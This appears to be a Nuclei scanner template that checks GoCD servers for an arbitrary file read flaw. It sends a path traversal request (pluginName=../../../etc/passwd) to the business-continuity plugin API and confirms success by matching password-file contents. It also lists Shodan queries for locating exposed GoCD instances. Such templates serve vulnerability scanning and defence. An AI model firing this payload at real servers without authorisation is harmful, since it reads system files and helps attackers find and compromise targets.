28 lines
757 B
YAML
28 lines
757 B
YAML
id: gocd-arbitrary-file
|
|
|
|
info:
|
|
name: GoCD Arbitrary File
|
|
author: dhiyaneshDk
|
|
severity: critical
|
|
reference:
|
|
- https://attackerkb.com/assessments/9101a539-4c6e-4638-a2ec-12080b7e3b50
|
|
- https://blog.sonarsource.com/gocd-pre-auth-pipeline-takeover
|
|
- https://twitter.com/wvuuuuuuuuuuuuu/status/1456316586831323140
|
|
tags: go,lfi,gocd
|
|
metadata:
|
|
shodan-query: 'http.title:"Create a pipeline - Go"'
|
|
shodan-query: 'html:"GoCD Version"'
|
|
requests:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/go/add-on/business-continuity/api/plugin?folderName=&pluginName=../../../etc/passwd"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: status
|
|
status:
|
|
- 200
|
|
- type: regex
|
|
regex:
|
|
- "root:.*:0:0:"
|